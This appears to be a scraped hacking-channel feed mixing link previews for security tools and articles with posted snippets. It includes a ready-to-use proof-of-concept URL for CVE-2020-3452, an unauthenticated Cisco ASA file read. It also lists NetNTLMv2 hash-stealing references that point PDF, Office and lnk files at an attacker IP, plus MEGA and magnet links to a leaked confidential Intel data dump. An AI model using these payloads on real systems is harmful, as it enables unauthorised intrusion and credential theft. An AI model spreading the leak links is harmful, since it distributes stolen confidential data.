GitHub - hlldz/dazzleUP: A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.
https://github.com/hlldz/dazzleUP
https://github.com/hlldz/dazzleUP
GitHub
GitHub - hlldz/dazzleUP: A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates…
A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems. - hlldz/dazzleUP
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
For example to read "/+CSCOE+/portal_inc.lua" file.
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
Happy Hacking!
For example to read "/+CSCOE+/portal_inc.lua" file.
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
Happy Hacking!
NATO releases Malware Analysis primer
https://ccdcoe.org/library/publications/malware-reverse-engineering-handbook/
https://ccdcoe.org/library/publications/malware-reverse-engineering-handbook/
Malware_Reverse_Engineering_Handbook.pdf
4.8 MB
Malware_Reverse_Engineering_Handbook.pdf
Flipper Zero — Tamagochi for Hackers by Flipper Devices Inc. — Kickstarter
https://www.kickstarter.com/projects/flipper-devices/flipper-zero-tamagochi-for-hackers
https://www.kickstarter.com/projects/flipper-devices/flipper-zero-tamagochi-for-hackers
Kickstarter
Flipper Zero — Multitool for Hackers
Open source multi-tool device for researching and pentesting radio protocols, access control systems, hardware, and more.
“Exploiting File Upload using Null byte” by Gupta Bless https://link.medium.com/VfjDpqmfD8
Medium
Exploiting File Upload using Null byte
In my previous blog related to FILE upload, I already discussed some basic techniques to bypass whitelisting of file extensions. Now in…
You can steal NetNTLMv2 by changing SMB port:
net use \\IP@80\t
or pdf : /F (\\\\IP@80\\t)
or subdoc : ///IP@80/t
or doc: Target="file://IP@80/t.dotx"
or lnk: URL=file://IP@80/t.htm
net use \\IP@80\t
or pdf : /F (\\\\IP@80\\t)
or subdoc : ///IP@80/t
or doc: Target="file://IP@80/t.dotx"
or lnk: URL=file://IP@80/t.htm
bashtop - Awesome Linux resource monitor - nixCraft
https://www.cyberciti.biz/open-source/command-line-hacks/bashtop-awesome-linux-resource-monitor-tool/
https://www.cyberciti.biz/open-source/command-line-hacks/bashtop-awesome-linux-resource-monitor-tool/
nixCraft
bashtop - Awesome Linux resource monitor that shows usage and stats for processor, memory, disks, and network
bashtop is an awesome resource monitor that shows usage and stats for processor, memory, disks, and network for Linux, macOS & FreeBSD/Unix.
Hacking Windows 10: How to Use SSH Tunnels to Forward Requests & Hack Remote Routers « Null Byte :: WonderHowTo
https://null-byte.wonderhowto.com/how-to/hacking-windows-10-use-ssh-tunnels-forward-requests-hack-remote-routers-0198465/
https://null-byte.wonderhowto.com/how-to/hacking-windows-10-use-ssh-tunnels-forward-requests-hack-remote-routers-0198465/
Null Byte
Hacking Windows 10: How to Use SSH Tunnels to Forward Requests & Hack Remote Routers
Without admin privileges, installing additional software, or modifying the Windows 10 firewall, an attacker can alter a router and perform a variety of...
😯👉This is the first 20gb release in a series of large Intel leaks. https://t.co/UTzz4YzEdc
💥MEGA https://t.co/5T1XeMHtnH
💥magnet:?xt=urn:btih:38f947ceadf06e6d3ffc2b37b807d7ef80b57f21
💥MEGA https://t.co/5T1XeMHtnH
💥magnet:?xt=urn:btih:38f947ceadf06e6d3ffc2b37b807d7ef80b57f21
Twitter
Catalin Cimpanu
NEW: Intel is investigating a security breach after 20GB of internal documents leak online -Data was published on MEGA today - Many documents are marked "confidential" and "restricted secret" -Leaker said he received the data from an anonymous hacker htt…
“Blind Remote Code Execution” by vivek chauhan https://link.medium.com/yRvqSUP3M8
Medium
How i find Blind Remote Code Execution vulnerability
Introduction
Defense Evasion: Hide Artifacts
https://www.hackingarticles.in/defense-evasion-hide-artifacts/
https://www.hackingarticles.in/defense-evasion-hide-artifacts/
Hacking Articles
Defense Evasion: Hide Artifacts - Hacking Articles
Today, in this article, we will focus on various methods that are implemented by an attacker to evade their detection by hiding artifacts in the